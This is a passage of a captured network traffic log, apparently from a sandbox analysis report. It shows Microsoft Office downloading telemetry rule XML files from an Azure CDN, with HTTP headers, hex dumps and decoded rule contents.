                                            2024-12-03 08:58:07 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            68192.168.2.44981713.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:08 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:08 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:08 GMT
                                            Content-Type: text/xml
                                            Content-Length: 479
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                            ETag: "0x8DC582B989EE75B"
                                            x-ms-request-id: 59a03737-a01e-00ab-1891-3f9106000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085808Z-174f7845968nxc96hC1EWRspw800000015bg000000008h3w
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:08 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            69192.168.2.44981813.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:08 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:09 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:08 GMT
                                            Content-Type: text/xml
                                            Content-Length: 415
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                            ETag: "0x8DC582BA80D96A1"
                                            x-ms-request-id: 098db11f-001e-0034-0901-42dd04000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085808Z-174f7845968n2hr8hC1EWR9cag000000159g000000007ama
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:09 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            70192.168.2.44981913.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:08 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:09 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:09 GMT
                                            Content-Type: text/xml
                                            Content-Length: 471
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                            ETag: "0x8DC582B97E6FCDD"
                                            x-ms-request-id: 4c860516-801e-00a3-3252-437cfb000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085809Z-174f7845968nxc96hC1EWRspw800000015dg00000000639u
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:09 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            71192.168.2.44982013.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:08 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:09 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:09 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                            ETag: "0x8DC582B9C710B28"
                                            x-ms-request-id: b6bf5bce-301e-0052-1df3-4465d6000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085809Z-174f7845968psccphC1EWRuz9s00000015vg000000008xv9
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:09 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            72192.168.2.44982113.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:09 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:09 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:09 GMT
                                            Content-Type: text/xml
                                            Content-Length: 477
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                            ETag: "0x8DC582BA54DCC28"
                                            x-ms-request-id: e297b188-201e-0000-7a1b-41a537000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085809Z-174f7845968frfdmhC1EWRxxbw00000015u00000000027ra
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:09 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            73192.168.2.44982213.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:10 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:10 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:10 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                            ETag: "0x8DC582BB7F164C3"
                                            x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085810Z-174f7845968xr5c2hC1EWRd0hn0000000qm0000000003ey7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            74192.168.2.44982313.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:10 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:11 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:11 GMT
                                            Content-Type: text/xml
                                            Content-Length: 477
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                            ETag: "0x8DC582BA48B5BDD"
                                            x-ms-request-id: 62698de6-501e-00a3-0df8-44c0f2000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085811Z-174f7845968vqt9xhC1EWRgten00000015v00000000016nm
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:11 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            75192.168.2.44982413.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:11 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:11 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:11 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                            ETag: "0x8DC582B9FF95F80"
                                            x-ms-request-id: 27481374-801e-0078-46b4-42bac6000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085811Z-174f7845968j6t2phC1EWRcfe800000015yg0000000014z0
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:11 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            76192.168.2.44982513.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:11 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:11 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:11 GMT
                                            Content-Type: text/xml
                                            Content-Length: 472
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                            ETag: "0x8DC582BB650C2EC"
                                            x-ms-request-id: a15be10d-401e-0029-636c-439b43000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085811Z-174f7845968glpgnhC1EWR7uec00000015s000000000a3de
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:11 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            77192.168.2.44982613.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:11 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:11 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:11 GMT
                                            Content-Type: text/xml
                                            Content-Length: 468
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                            ETag: "0x8DC582BB3EAF226"
                                            x-ms-request-id: ce20f954-a01e-006f-7a27-4413cd000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085811Z-174f7845968cdxdrhC1EWRg0en00000015q0000000003rv7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:11 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            78192.168.2.44982713.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:12 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:13 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:12 GMT
                                            Content-Type: text/xml
                                            Content-Length: 485
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                            ETag: "0x8DC582BB9769355"
                                            x-ms-request-id: e579458c-401e-0064-1dbd-4254af000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085812Z-174f78459685726chC1EWRsnbg00000015v0000000001g5n
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
